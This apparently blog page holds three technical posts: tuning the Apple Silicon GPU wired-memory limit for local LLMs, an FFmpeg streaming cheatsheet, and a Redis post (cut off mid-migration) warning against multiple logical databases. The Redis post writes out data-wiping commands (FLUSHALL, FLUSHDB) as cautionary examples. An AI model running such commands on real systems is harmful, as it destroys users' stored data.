Your Mac Does Not Have Hidden VRAM, But This Tweak Helps Local LLMs

There is a particular kind of modern disappointment that only happens on an Apple Silicon Mac. You have 16 GB of unified memory, your model file is “only” 11 GB on disk, LM Studio looks optimistic for a moment, and then the load fails like a Victorian gentleman fainting at the sight of a spreadsheet. The internet calls this “hidden VRAM”. That phrase is catchy, but it is also slightly nonsense. Your Mac does not have secret gamer VRAM tucked behind the wallpaper. What it has is a shared memory pool and a tunable guardrail for how much of that pool the GPU side of the system is allowed to wire down. Move the guardrail carefully and some local LLMs that previously refused to load will suddenly run. Move it carelessly and your machine turns into a very expensive beachball generator.

Apple Silicon chip with a glowing memory fence and model blocks pushing against it
This is not free VRAM. It is a movable fence inside a shared pool.

The practical knob is iogpu.wired_limit_mb. On this 16 GB Apple Silicon Mac, the default is still the default from the video:

$ sysctl iogpu.wired_limit_mb
iogpu.wired_limit_mb: 0

That 0 means “use the system default policy”, not “unlimited”. For people running local models, that distinction matters. The interesting bit is that the policy is often conservative enough that a model which should fit on paper does not fit in practice once GPU allocations, KV cache, context length, the window server, and ordinary macOS overhead all take their cut. The result is a very familiar sentence: failed to load model.

What This Setting Actually Changes

Apple’s architecture is the key to understanding why this works at all. Unlike a desktop PC with separate system RAM and discrete GPU VRAM, Apple Silicon uses one shared pool. Apple says it plainly:

“Apple GPUs have a unified memory model in which the CPU and the GPU share system memory.” – Apple Developer, Choosing a resource storage mode for Apple GPUs

That one sentence explains both the magic and the pain. The magic is that Apple laptops and minis can run surprisingly capable local models without a discrete GPU at all. The pain is that every byte you hand to GPU-backed inference is a byte you are not handing to the rest of the operating system. This is capacity planning, not sorcery. Kleppmann would recognise it instantly from Designing Data-Intensive Applications: one finite resource, several hungry consumers, and trouble whenever you pretend the budget is not real.

The lower-level Metal API exposes the same idea in more formal language. The property recommendedMaxWorkingSetSize is defined by Apple as:

“An approximation of how much memory, in bytes, this GPU device can allocate without affecting its runtime performance.” – Apple Developer, MTLDevice.recommendedMaxWorkingSetSize

Notice the wording: without affecting runtime performance. Apple is not promising a hard technical ceiling. It is describing a safety line. The iogpu.wired_limit_mb trick is, in effect, you saying: “thank you for the safety line, I would like to move it because I know what else is running on this machine”.

If you want to see the same concept from code rather than from a slider in LM Studio, a tiny Metal program can query the recommended budget directly:

import Metal

if let device = MTLCreateSystemDefaultDevice() {
    let bytes = device.recommendedMaxWorkingSetSize
    let gib = Double(bytes) / 1024.0 / 1024.0 / 1024.0
    print(String(format: "Recommended GPU working set: %.2f GiB", gib))
}

That value is the polite answer. iogpu.wired_limit_mb is how you become impolite, but hopefully still civilised.

Why Models Fail Before RAM Looks Full

Most newcomers look at the model file size and do schoolboy arithmetic: “11 GB file, 16 GB machine, therefore fine.” That works right up until reality arrives with a clipboard. Runtime memory use includes the model weights, the KV cache, backend allocations, context-length overhead, app overhead, and the rest of macOS. LM Studio explicitly gives you a way to inspect this before you pull the pin:

“Preview memory requirements before loading a model using --estimate-only.” – LM Studio Docs, lms load

That is not a decorative feature. Use it. Also note LM Studio’s platform advice for macOS: 16GB+ RAM recommended, with 8 GB machines reserved for smaller models and modest contexts. The point is simple: local inference is not decided by model download size alone. It is decided by total live working set.

# Ask LM Studio for the memory estimate before loading
lms load --estimate-only openai/gpt-oss-20b

# Lower context if the estimate is close to the edge
lms load --estimate-only openai/gpt-oss-20b --context-length 4096

# If needed, reduce GPU usage rather than insisting on "max"
lms load openai/gpt-oss-20b --gpu 0.75 --context-length 4096

That last point is underappreciated. Sometimes the right answer is not “raise the wired limit”. Sometimes the right answer is “pick a saner context length” or “run a smaller quant”. Engineers love hidden toggles because they feel like boss fights. In practice, boring budgeting wins.

The Failure Modes Nobody Mentions in the Thumbnail

The YouTube version of this story is understandably upbeat: type command, load bigger model, cue triumphant tokens per second. The real world deserves a sterner briefing. Three failure cases show up over and over.

Case 1: The Model File Fits, But the Live Working Set Does Not

The trigger is a model whose weights fit comfortably on disk, but whose runtime footprint exceeds the combined budget once context and cache are included.

# Bad mental model:
# "The GGUF is 11 GB, so my 16 GB Mac can obviously run it."

model_weights_gb = 11.2
kv_cache_gb = 1.8
backend_overhead_gb = 0.8
desktop_overhead_gb = 2.0

total_live_working_set = (
    model_weights_gb +
    kv_cache_gb +
    backend_overhead_gb +
    desktop_overhead_gb
)

print(total_live_working_set)  # 15.8 GB, and we still have no safety margin

What happens next is either a clean refusal to load or a dirty scramble into memory pressure. The correct pattern is to estimate first, shrink context if necessary, and accept that a lower-bit quant is often the smarter answer than a higher limit.

# Better approach: estimate, then choose the model tier that fits
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only openai/gpt-oss-20b --context-length 4096

# If the estimate is borderline, step down a tier
lms load qwen/qwen3-8b --gpu max --context-length 8192

Case 2: You Raise the Limit So High That macOS Starts Fighting Back

This happens when you treat unified memory as if it were dedicated VRAM and leave the operating system too little breathing room. Headless Mac minis tolerate this better. A laptop with browsers, Finder, Spotlight, and a normal human life happening on it does not.

# Aggressive and often reckless on a 16 GB machine
sudo sysctl iogpu.wired_limit_mb=16000

# Then immediately try to load a borderline model
lms load openai/gpt-oss-20b --gpu max

The machine may still succeed, which is what makes this dangerous. Success under orange memory pressure is not proof of wisdom. It is proof that you got away with it once. The better pattern is to leave deliberate headroom for the OS and keep a close eye on Activity Monitor while you test.

# A more conservative example for a 16 GB Mac
sudo sysctl iogpu.wired_limit_mb=14336

# Verify the setting
sysctl iogpu.wired_limit_mb

# Then test with a realistic context length
lms load openai/gpt-oss-20b --context-length 4096

Case 3: You Optimise the Wrong Thing and Ignore Context Length

A surprisingly common mistake is to chase the biggest possible model whilst leaving an unnecessarily large context window enabled. KV cache is not free. A smaller context often buys you more stability than another dramatic sysctl ever will.

# Bad: max everything, then act surprised
lms load some-14b-model --gpu max --context-length 32768

# Better: fit the workload, not your ego
lms load some-14b-model --gpu max --context-length 4096
lms load some-8b-model  --gpu max --context-length 8192

This is the computing equivalent of bringing a grand piano to a pub quiz. Impressive, yes. Appropriate, no.

Memory pressure gauge rising as an oversized model pushes against system limits
The danger sign is not failure to load. It is successful loading with no oxygen left for the rest of the machine.

How to Tune It Without Turning Your Mac Into a Toaster

The safe way to use this setting is incremental, reversible, and boring. Those are good qualities in systems work. Start from default, raise in steps, test one model at a time, and watch memory pressure rather than vibes.

  1. Check the current value. If it is 0, you are on the system default policy.
  2. Pick a target that still leaves real headroom. On a 16 GB machine, 14 GB is already adventurous. On a dedicated headless box, you can be bolder.
  3. Restart the inference app. Tools like LM Studio need to re-detect the budget.
  4. Load with a realistic context length. Do not benchmark recklessness.
  5. Reset to default if the machine becomes unpleasant. A responsive Mac beats a heroic screenshot.
# 1. Inspect current policy
sysctl iogpu.wired_limit_mb

# 2. Raise cautiously
sudo sysctl iogpu.wired_limit_mb=12288

# 3. Test, observe, then step up if needed
sudo sysctl iogpu.wired_limit_mb=14336

# 4. Return to default policy
sudo sysctl iogpu.wired_limit_mb=0

If you truly need this on every boot, automate it like any other operational setting. Treat it as host configuration, not as a ritual you half-remember from a video. But also ask the adult question first: if you need a startup hack to run the model comfortably, should you really be running that model on this machine?

The second practical tool is estimation. Run the estimator before the load, not after the error:

# Compare two candidates before wasting time
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only mistral-small-3.1-24b --context-length 4096

# Use the estimate to choose the smaller model or context
lms load qwen/qwen3-8b --gpu max --context-length 8192

Which Models Actually Make Sense on Different Apple Silicon Macs

This is the section everybody really wants. Exact numbers depend on quant format, context length, backend behaviour, and what else the machine is doing. But the tiers below are realistic enough to save people from magical thinking.

Mac memory tier Comfortable local LLM tier Possible with tuning Usually a bad idea
16 GB 3B to 8B models, 12B class with modest context Some 14B to 20B quants if you raise the limit and stay disciplined Large context 20B+, 30B-class models during normal desktop use
24 GB 8B to 14B models, many 20B-class quants Some 24B to 32B models with sensible context Treating it like a 64 GB workstation
32 GB to 48 GB 14B to 32B models comfortably, larger contexts for practical work Some 70B quants on the upper end, especially on dedicated machines Huge models plus giant context plus desktop multitasking
64 GB and above 30B to 70B-class quants become genuinely usable Aggressive large-model experimentation on headless or dedicated Macs Assuming every app uses memory exactly the same way

If you want a one-line rule of thumb, it is this: on a 16 GB machine, think “excellent 7B to 8B box, adventurous 14B box, occasional 20B parlour trick”. On a 24 GB or 32 GB machine, the world gets much nicer. On a 64 GB+ Mac Studio, the conversation changes from “can I load this?” to “is the speed good enough for the inconvenience?”

Also remember that smaller, better-tuned models often beat larger awkward ones for day-to-day coding, search, summarisation, and chat. A responsive 8B or 14B model you actually use is more valuable than a 20B model that only runs when the stars align and Chrome is closed.

# Practical workflow: compare candidates before downloading your dignity away
lms load --estimate-only qwen/qwen3-4b
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only openai/gpt-oss-20b --context-length 4096
Tiered Apple Silicon model sizing chart with memory classes and LLM blocks
The machine class matters more than the myth. Fit the model tier to the memory tier.

When the Default Setting Is Actually Fine

The balanced answer is that the default exists for good reasons. If your Mac is a general-purpose laptop, if you care about battery life and responsiveness, if you run multiple heavy apps at once, or if your local LLM work is mostly 7B to 8B models, leave the setting alone. The system default is often the correct trade-off.

This is also true if your workload is bursty rather than continuous. For occasional summarisation, coding assistance, or local RAG over documents, it is usually better to pick a slightly smaller model and preserve the machine’s overall behaviour. The hidden cost of “bigger model at any price” is that you stop trusting the computer. Once a laptop feels brittle, you use it less. That is bad engineering and worse ergonomics.

There is another subtle point. The wired-limit trick helps most when the machine is effectively dedicated to inference: a headless Mac mini, a quiet box on the shelf, a Mac Studio cluster, or a desktop session where you are willing to treat inference as the primary job. The closer your Mac is to a single-purpose appliance, the more sense this tweak makes.

What To Check Right Now

  • Check the current policy: run sysctl iogpu.wired_limit_mb and confirm whether you are on the default setting.
  • Estimate before loading: use lms load --estimate-only so you know the model’s live working set before you commit.
  • Audit context length: if you are using 16k or 32k context by habit, ask whether 4k or 8k would do the same job.
  • Watch memory pressure, not just free RAM: Activity Monitor tells you more truth than a single headline number.
  • Leave deliberate headroom: a model that barely runs is not a production setup, it is a stunt.
  • Reset when testing is over: sudo sysctl iogpu.wired_limit_mb=0 is a perfectly respectable ending.
Minimal dark checklist for Apple Silicon LLM tuning with commands and safety guardrails
Most wins come from estimation, context discipline, and realistic model choice, not from one dramatic command.

The honest headline, then, is better than the clickbait one. Your Mac does not have hidden VRAM waiting to be unlocked like a cheat code in a 1998 driving game. What it has is unified memory, a conservative GPU working-set policy, and enough flexibility that informed users can rebalance the machine for local inference. That is genuinely useful. It is also exactly the sort of useful that punishes people who confuse “possible” with “free”.

Video Attribution

This article was inspired by Alex Ziskind’s video on adjusting the GPU wired-memory limit for local LLM use on Apple Silicon Macs. The video is worth watching for the quick demonstration, particularly if you want to see the behaviour in LM Studio before you touch your own machine.

Original video: Your Mac Has Hidden VRAM… Here’s How to Unlock It by Alex Ziskind.

nJoy 😉

FFmpeg Cheatsheet 2026: Modern Streaming, Packaging, and Command-Line Sorcery

FFmpeg is what happens when a Swiss Army knife gets a PhD in multimedia and then refuses to use a GUI. It can inspect, trim, remux, transcode, filter, normalise, package, stream, and automate media pipelines with almost rude efficiency. The catch is that it speaks in a grammar that is perfectly logical and completely uninterested in your vibes. Put one option in the wrong place and FFmpeg will not “figure it out”. It will hand you a lesson in command-line causality.

This version is built to be kept open in a tab: a smarter cheatsheet, a modern streaming reference, a compact guide to the commands worth memorising, and a curated collection of official docs plus a few YouTube resources that are actually worth your time. We will cover the fast path, the dangerous path, and the production path.

Dark technical visualisation of FFmpeg processing audio and video streams
FFmpeg in one picture: streams go in, decisions get made, codecs either behave or get replaced.

First Principles: How FFmpeg Actually Thinks

Most FFmpeg confusion begins with the wrong mental model. Humans think in files. FFmpeg thinks in inputs, streams, codecs, filters, mappings, and outputs. A single file can contain several streams: video, multiple audio tracks, subtitles, chapters, timed metadata. FFmpeg lets you inspect that structure, choose what to keep, decode only what needs changing, then write a new container deliberately.

The core trio is simple. ffmpeg transforms media. ffprobe tells you what is actually in the file. ffplay previews quickly. The smartest FFmpeg habit is also the least glamorous: ffprobe first, ffmpeg second. Guessing stream layout is how people end up with silent video, the wrong commentary track, or subtitles that evaporate on contact with MP4.

“As a general rule, options are applied to the next specified file. Therefore, order is important, and you can have the same option on the command line multiple times.” – FFmpeg Documentation, ffmpeg manual

That rule explains most self-inflicted FFmpeg pain. Input options belong before the input they affect. Output options belong before the output they affect. You are not writing prose. You are wiring a pipeline.

ffmpeg [global-options] \
  [input-options] -i input1 \
  [input-options] -i input2 \
  [filter-and-map-options] \
  [output-options] output.ext

The other distinction worth burning into memory is container versus codec. MP4, MKV, MOV, WebM, TS, and M4A are containers. H.264, HEVC, AV1, AAC, Opus, MP3, ProRes, and DNxHR are codecs. Containers are boxes. Codecs are how the contents were compressed. A huge fraction of “FFmpeg is broken” reports are really “I changed the box and forgot the contents still have rules”.

Dark diagram showing FFmpeg command flow from input to streams to filters to output
The command-flow model: inspect streams, decide what gets copied, decide what gets filtered, then write the output on purpose.

The Fast Lane: Steal These Commands First

If you only memorise a dozen FFmpeg moves, make them these. They cover the majority of real-world jobs: inspect, copy, trim, transcode, subtitle, extract, package, and deliver.

Job Command Use it when
Inspect a file properly ffprobe -hide_banner input.mkv You want the truth about streams before touching anything.
Get scriptable metadata ffprobe -v error -show_streams -show_format -of json input.mp4 Automation, CI, or conditional workflows.
Remux without quality loss ffmpeg -i input.mkv -c copy output.mp4 The streams are already compatible, you just need a different container.
Trim quickly ffmpeg -ss 00:01:30 -i input.mp4 -t 20 -c copy clip.mp4 Speed matters more than perfect frame accuracy.
Trim accurately ffmpeg -i input.mp4 -ss 00:01:30 -t 20 -c:v libx264 -crf 18 -c:a aac clip.mp4 Tutorial clips, ad boundaries, subtitle-sensitive edits.
Good default MP4 for the web ffmpeg -i input.mov -c:v libx264 -preset slow -crf 20 -c:a aac -b:a 192k -movflags +faststart output.mp4 You need a boring, reliable, browser-friendly output. Boring is a compliment here.
Resize while keeping aspect ratio ffmpeg -i input.mp4 -vf "scale=1280:-2" -c:v libx264 -crf 20 -c:a aac output.mp4 Social uploads, previews, smaller delivery files.
Extract audio ffmpeg -i input.mp4 -vn -c:a copy audio.m4a The source audio codec already fits the target container.
Normalise speech ffmpeg -i input.wav -af "loudnorm=I=-16:TP=-1.5:LRA=11" output.wav Podcasts, tutorials, voice-overs, screen recordings.
Burn subtitles in ffmpeg -i input.mp4 -vf "subtitles=subs.srt" -c:v libx264 -crf 18 -c:a copy output.mp4 You need one universal file and do not trust player subtitle support.
Contact sheet ffmpeg -i input.mp4 -vf "fps=1/10,scale=320:-1,tile=4x4" -frames:v 1 sheet.png Fast content review without watching the whole thing.
Concatenate matching files ffmpeg -f concat -safe 0 -i files.txt -c copy merged.mp4 Inputs share compatible codecs and parameters.

“Streamcopy is useful for changing the elementary stream count, container format, or modifying container-level metadata. Since there is no decoding or encoding, it is very fast and there is no quality loss.” – FFmpeg Documentation, ffmpeg manual

If you remember one performance trick, remember -c copy. It is the difference between “done in a second” and “let me hear all your laptop fans introduce themselves”.

Modern FFmpeg: Streaming, Packaging, and Delivery in 2026

This is where a lot of older FFmpeg write-ups feel dusty. Modern usage is not just “convert AVI to MP4”. It is packaging for adaptive streaming, feeding live ingest pipelines, generating web-safe delivery files, and choosing the correct transport for the job instead of shouting at RTMP because it was popular in 2014.

“Apple HTTP Live Streaming muxer that segments MPEG-TS according to the HTTP Live Streaming (HLS) specification.” – FFmpeg Formats Documentation, HLS muxer

“WebRTC (Real-Time Communication) muxer that supports sub-second latency streaming according to the WHIP (WebRTC-HTTP ingestion protocol) specification.” – FFmpeg Formats Documentation, WHIP muxer

That is the modern landscape in miniature. FFmpeg is not only a transcoder. It is a packaging and transport tool. Use the right mode for the latency, compatibility, and scale you actually need.

Goal Best fit Starter command
Simple browser playback MP4 with H.264/AAC ffmpeg -i in.mov -c:v libx264 -crf 20 -c:a aac -movflags +faststart out.mp4
Adaptive VOD streaming HLS or DASH ffmpeg -i in.mp4 -c:v libx264 -c:a aac -hls_time 6 -hls_playlist_type vod stream.m3u8
Traditional live platform ingest RTMP ffmpeg -re -i in.mp4 -c:v libx264 -c:a aac -f flv rtmp://server/app/key
More robust live transport over messy networks SRT ffmpeg -re -i in.mp4 -c:v libx264 -c:a aac -f mpegts "srt://host:port?mode=caller&latency=2000000"
Sub-second browser ingest WHIP / WebRTC ffmpeg -re -i in.mp4 -c:v libx264 -c:a opus -f whip "http://whip-endpoint.example/whip"

Here are the practical streaming recipes worth saving.

HLS VOD

ffmpeg -i input.mp4 \
  -c:v libx264 -preset medium -crf 22 \
  -c:a aac -b:a 128k \
  -hls_time 6 \
  -hls_playlist_type vod \
  -hls_segment_filename "seg-%03d.ts" \
  stream.m3u8

DASH Packaging

ffmpeg -i input.mp4 \
  -c:v libx264 -preset medium -crf 22 \
  -c:a aac -b:a 128k \
  -f dash \
  manifest.mpd

RTMP Ingest

ffmpeg -re -i input.mp4 \
  -c:v libx264 -preset veryfast -b:v 4500k -maxrate 4500k -bufsize 9000k \
  -c:a aac -b:a 160k \
  -f flv rtmp://server/app/stream-key

SRT Ingest

ffmpeg -re -i input.mp4 \
  -c:v libx264 -preset veryfast -b:v 4500k \
  -c:a aac -b:a 160k \
  -f mpegts "srt://example.com:9000?mode=caller&latency=2000000"

That latency value is in microseconds, which is the kind of small detail that turns a calm afternoon into a surprisingly educational one.

WHIP / WebRTC Ingest

ffmpeg -re -i input.mp4 \
  -c:v libx264 -preset veryfast \
  -c:a opus -b:a 128k \
  -f whip "https://whip.example.com/rtc/v1/whip/?app=live&stream=demo"

WHIP is interesting because it reflects the current internet, not the old one. If your target is low-latency browser delivery, WHIP and WebRTC are now part of the real conversation, not just interesting acronyms for protocol collectors.

Dark streaming pipeline diagram showing input transcoding into HLS segments and playlist
Modern FFmpeg is packaging plus transport plus compatibility engineering, not just transcoding.

Hardware Acceleration Without Lying to Yourself

Modern FFmpeg usage also means knowing when to use hardware encoders. They are fantastic when throughput matters: live streaming, batch transcoding, preview generation, cloud pipelines, and “I have 800 files and would prefer not to age visibly today”. They are not always the best answer for maximum compression efficiency or highest archival quality.

The practical rule is simple. If you need the best quality-per-bit, software encoders like libx264, libx265, and libaom-av1 still matter. If you need speed and acceptable quality, hardware encoders are often the right move.

Platform Common encoder Example
NVIDIA h264_nvenc, hevc_nvenc, sometimes AV1 on newer cards ffmpeg -i in.mp4 -c:v h264_nvenc -b:v 6M -c:a aac out.mp4
Intel / AMD on Linux h264_vaapi, hevc_vaapi ffmpeg -hwaccel vaapi -hwaccel_output_format vaapi -i in.mp4 -c:v h264_vaapi -b:v 6M out.mp4
macOS h264_videotoolbox, hevc_videotoolbox ffmpeg -i in.mp4 -c:v h264_videotoolbox -b:v 6M -c:a aac out.mp4

The mistake people make is assuming hardware encode means “same quality, just faster”. Often it means “faster, different tuning, sometimes larger bitrate for comparable quality”. Be honest about the trade-off. This is not a moral issue. It is an engineering one.

Failure Cases That Keep Reappearing

Hunt and Thomas argue in The Pragmatic Programmer that good tools reward understanding over superstition. FFmpeg is one of the clearest examples of that principle on the command line. Here are the mistakes that keep burning people because they look plausible until you understand what FFmpeg is actually doing.

Case 1: You Wanted Speed, but Also Expected Frame Accuracy

Putting -ss before -i is fast. It is often not frame-accurate. That is a feature, not a betrayal.

# Fast, usually keyframe-aligned
ffmpeg -ss 00:10:00 -i input.mp4 -t 15 -c copy clip.mp4

If you need surgical cuts, decode and re-encode.

ffmpeg -i input.mp4 -ss 00:10:00 -t 15 \
  -c:v libx264 -crf 18 -c:a aac \
  clip-accurate.mp4

Case 2: You Asked for a Filter and Also Asked Not to Decode Anything

Filters need decoded frames. Stream copy avoids decoding. These are incompatible desires, not a creative workflow.

# Contradiction in command form
ffmpeg -i input.mp4 -vf "scale=1280:-2" -c copy output.mp4

The corrected pattern is to re-encode video and copy audio if it stays untouched.

ffmpeg -i input.mp4 -vf "scale=1280:-2" \
  -c:v libx264 -crf 20 \
  -c:a copy \
  output.mp4

Case 3: FFmpeg Picked the Wrong Streams Because You Left It to Fate

Auto-selection works until the source has multiple languages, commentary, descriptive audio, or subtitles. At that point, the polite thing to do is map explicitly.

# Ambiguous and sometimes unlucky
ffmpeg -i movie.mkv -c copy output.mp4
ffprobe -hide_banner movie.mkv

ffmpeg -i movie.mkv \
  -map 0:v:0 \
  -map 0:a:0 \
  -map 0:s:0? \
  -c:v copy -c:a copy -c:s mov_text \
  output.mp4

Case 4: Your Filtergraph Became Punctuation Soup

Once you move into -filter_complex, labels stop being optional niceties. They become the difference between clarity and a future headache.

# Hard to reason about
ffmpeg -i main.mp4 -i logo.png -i music.wav \
  -filter_complex "[0:v][1:v]overlay=20:20,scale=1280:-2;[2:a]volume=0.25[a]" \
  -map 0:v -map "[a]" output.mp4

Break the graph into named stages.

ffmpeg -i main.mp4 -i logo.png -i music.wav \
  -filter_complex "\
    [0:v][1:v]overlay=20:20[branded]; \
    [branded]scale=1280:-2[vout]; \
    [2:a]volume=0.25[aout]" \
  -map "[vout]" -map "[aout]" \
  -c:v libx264 -crf 20 -c:a aac \
  output.mp4
Dark diagram of FFmpeg filtergraph with labelled nodes and branches
Filtergraphs stop being scary the moment you read them as labelled dataflow instead of punctuation.

The Best Collection to Bookmark

If you want the strongest FFmpeg learning stack from basic to advanced, use this order. Not because it is trendy, but because it respects how people actually learn complicated tools: truth first, intuition second, repetition third.

  1. FFmpeg documentation portal – the source of truth for manuals, components, and the official reference tree.
  2. ffmpeg manual – command order, stream copy, mapping, options, and the grammar of the tool.
  3. ffprobe documentation – essential if your work is even slightly automated.
  4. FFmpeg filters documentation – the real reference once you graduate from single-flag edits.
  5. FFmpeg formats documentation – where modern packaging, HLS, DASH, and WHIP start becoming concrete.
  6. FFmpeg protocols documentation – required reading once live ingest and transport enter the picture.
  7. STREAM MAPPING with FFMPEG – Everything You Need to Know – one of the best targeted explainers on a concept that causes disproportionate pain.
  8. FFMPEG & Filter Complex: A Visual Guide to the Filtergraph Usage – useful once the commands stop being linear.
  9. FFmpeg FILTERS: How to Use Them to Manipulate Your Videos – a solid bridge from basic edits to compositional thinking.
  10. Video and Audio Processing in FFMPEG – useful if you learn best by revisiting the topic from multiple angles.

The rule is simple: use YouTube for intuition, use the official docs for truth. The people who confuse those two categories usually end up with very confident commands and very confusing output.

What to Check Right Now

  • Adopt one boring, reliable web delivery recipe – H.264, AAC, and -movflags +faststart will solve more problems than exotic cleverness.
  • Use ffprobe before every important transcode – that one habit prevents a ridiculous amount of avoidable breakage.
  • Reach for -c copy first when no transformation is needed – it is faster and lossless, which is suspiciously close to magic.
  • Move from RTMP-only thinking to transport-aware thinking – HLS for compatibility, DASH for adaptive packaging, SRT for rougher networks, WHIP for low-latency browser workflows.
  • Pick hardware encoders when throughput matters and software encoders when efficiency matters – this is the real trade-off, not ideology.
  • Build a private snippets file – five good FFmpeg recipes will do more for your sanity than fifty vague memories.

FFmpeg rewards the same engineering habit that every serious tool rewards: inspect first, be explicit, automate the boring parts, and choose the transport and packaging that fit the real system in front of you. Do that and FFmpeg stops feeling like cryptic wizardry and starts feeling like infrastructure. Which is exactly what it is.

nJoy 😉

Redis Databases: The Anti-Pattern That Haunts Production

Redis is one of those tools you adopt on a Monday and depend on completely by Thursday. It’s fast, it’s simple, and its data structures make your brain feel big. But buried inside Redis is a feature that has been silently causing production incidents for years: multiple logical databases within a single instance. You’ve probably used it. You might be using it right now. And there’s a very good chance it’s going to bite you at the worst possible moment.

Dark visualization of Redis databases sharing a single server process with interference between them
Multiple Redis databases: they look separate, but they live in the same house and share everything

What Redis Databases Actually Are

Redis ships with 16 databases numbered 0 through 15. You switch between them using the SELECT command. Each database has its own keyspace, which means keys named user:1 in database 0 are completely separate from user:1 in database 5. On the surface this looks like proper isolation. It is not.

The Redis documentation itself is blunt about this. From the official docs on SELECT:

“Redis databases should not be used as a way to separate different application data. The proper way to do this is to use separate Redis instances.” — Redis documentation, SELECT command

This isn’t buried in a footnote. It’s right there in the command reference. And yet, multiple databases are everywhere in production. Why? Because they’re convenient. Running one Redis process is simpler than running three. And the keyspace separation looks exactly like the isolation you actually need.

# This looks clean and organised
redis-cli SELECT 0   # application sessions
redis-cli SELECT 5   # background pipeline processing
redis-cli SELECT 10  # lightweight caching

# What you think you have: three isolated stores
# What you actually have: three buckets in one leaking tank

The Shared Resource Problem: What Actually Goes Wrong

Every Redis database within a single instance shares the same server process. That means one pool of memory, one CPU thread (Redis is single-threaded for commands), one network socket, one set of configuration limits. When you SELECT a different database number, you’re not switching to a different process. You’re just telling Redis to look in a different keyspace. The underlying machinery is identical.

Kleppmann in Designing Data-Intensive Applications explains why this matters at a systems level: shared resources without isolation boundaries mean a fault in one subsystem propagates to all others. He’s talking about distributed systems broadly, but the principle applies here with brutal precision. Your databases are not subsystems. They are namespaces sharing a single subsystem.

Here is what that looks like in practice.

Case 1: Memory Eviction Wipes Your Cache

You configure a single Redis instance with maxmemory 4gb and maxmemory-policy allkeys-lru. You use database 5 for pipeline job queues and database 10 for caching API responses. Your pipeline goes through a burst period and starts writing thousands of large job payloads into database 5.

# redis.conf
maxmemory 4gb
maxmemory-policy allkeys-lru

# Your pipeline flooding database 5
import redis
r = redis.Redis(db=5)
for job in burst_of_10k_jobs:
    r.set(f"job:{job.id}", job.payload, ex=3600)  # big payloads

# Meanwhile in your web app...
cache = redis.Redis(db=10)
result = cache.get("api:products:page:1")  # returns None — evicted
# Cache miss. Your DB gets hammered.

When Redis hits the memory limit it runs LRU eviction across all keys in all databases. It doesn’t know or care that database 10’s cache keys are serving live user traffic. It just evicts whatever is least recently used. Your carefully populated cache gets gutted to make room for the pipeline. Cache hit rate goes from 85% to 12%. Your database gets hammered. Everyone’s pager goes off at 2am.

This is not a hypothetical. It’s a well-documented operational failure mode.

Case 2: FLUSHDB Takes Down More Than You Planned

You’re cleaning up stale test data. You connect to what you think is the test database and run FLUSHDB. Redis flushes database 0. Your sessions are in database 0. Your production users are now all logged out simultaneously.

# Developer runs this thinking they're on the test DB
redis-cli -n 0 FLUSHDB

# But your sessions were also on DB 0
# Every logged-in user just got kicked out
# Support tickets: many

With separate instances, this failure mode is impossible. You’d have to explicitly connect to the production instance and deliberately flush it. The separate instance is an actual boundary. The database number is just a label.

Case 3: FLUSHALL Is Always a Disaster

Someone runs FLUSHALL to clean up a database. FLUSHALL wipes every database in the instance. It doesn’t ask which one. If all your databases are in one Redis instance, this single command takes out everything: your sessions, your pipeline queues, your caches, your temporary data. Everything. Simultaneously.

# Looks like it's cleaning just one thing
redis-cli FLUSHALL  # deletes EVERY database (0 through 15)

# Equivalent damage: one wrong command vaporises
# db 0: sessions     → all users logged out
# db 5: pipeline     → all queued jobs lost
# db 10: cache       → cache cold, DB under full load

Case 4: A Slow Operation Blocks Everything

Redis is single-threaded for command execution. A slow operation in one database blocks commands in all other databases. You’re running a large KEYS * scan in database 5 during maintenance (yes, you know not to do this, but someone does it anyway). It takes 800ms. For 800ms, every GET in database 10 queues up. Your cache layer is unresponsive. Your application timeout counters tick.

# Someone runs this on db 5 "just to debug something"
redis-cli -n 5 KEYS "*pipeline*"
# Returns after 800ms

# During those 800ms, database 10 clients are blocked:
cache.get("user:session:abc123")  # waiting... waiting...
# Your app's 500ms timeout fires
# HTTP 504 responses hit your users

With separate instances, a blocked db 5 instance doesn’t touch db 10’s instance. The processes are independent.

Dark diagram showing how Redis single-threaded commands and shared memory cause cross-database interference
One process, one thread, one memory pool: a bad day in database 5 is a bad day everywhere

The Redis Cluster Problem: A Hard Wall

Here’s a constraint that isn’t optional or configurable. Redis Cluster, which is the standard approach for horizontal scaling and high availability in production, only supports database 0.

“Redis Cluster supports a single database, and the SELECT command is not allowed.” — Redis Cluster specification

If you’ve built your application around multiple database numbers and you later need to scale horizontally with Redis Cluster, you’re stuck. You have to refactor your data access layer, migrate your keys, and retest everything. The cost of the “convenient” multi-database approach arrives as a large refactoring bill exactly when you can least afford it: when your traffic is growing.

The Proper Pattern: Separate Instances

The correct approach is to run a separate Redis instance for each logical use case. This is not complicated. Redis has a tiny footprint. Running three instances uses almost no additional overhead compared to running one with three databases.

# redis-pipeline.conf
port 6380
maxmemory 1gb
maxmemory-policy noeviction  # pipeline jobs must NOT be evicted
save 900 1                   # persist pipeline jobs to disk

# redis-cache.conf
port 6381
maxmemory 2gb
maxmemory-policy allkeys-lru  # cache should evict LRU freely
save ""                       # no persistence needed for cache

# redis-sessions.conf
port 6382
maxmemory 512mb
maxmemory-policy volatile-lru  # only evict keys with TTL set
save 60 1000                   # persist sessions more aggressively

Notice what this gives you that you absolutely cannot have with multiple databases. Each instance has its own maxmemory and its own maxmemory-policy. Your pipeline instance uses noeviction because job loss is unacceptable. Your cache instance uses allkeys-lru because cache misses are fine. Your session instance uses volatile-lru and persists aggressively. These policies are mutually exclusive requirements. You cannot satisfy them with a single configuration file.

# Application connections — clean and explicit
import redis

pipeline_redis = redis.Redis(host='localhost', port=6380)
cache_redis    = redis.Redis(host='localhost', port=6381)
session_redis  = redis.Redis(host='localhost', port=6382)

# Now a pipeline burst doesn't evict cache entries
# A FLUSHDB on cache doesn't touch sessions
# A slow pipeline scan doesn't block session lookups
# Each can scale, replicate, and fail independently

The Pragmatic Programmer’s core principle of orthogonality applies perfectly here: components that have nothing to do with each other should not share internal state. Your pipeline and your cache are orthogonal concerns. Coupling them through a shared Redis process violates that principle, and you pay for the violation eventually.

Dark architectural diagram showing three independent Redis instances with separate resources, configurations and isolation
Separate instances: different ports, different configs, different memory policies, zero cross-contamination

How to Migrate Away From Multiple Databases

If you’re already using multiple databases in production, the migration is straightforward but requires care. Here’s the logical path.

Step 1: Inventory your databases. Connect to your Redis instance and check what’s actually living in each database.

# Check key counts per database
redis-cli INFO keyspace
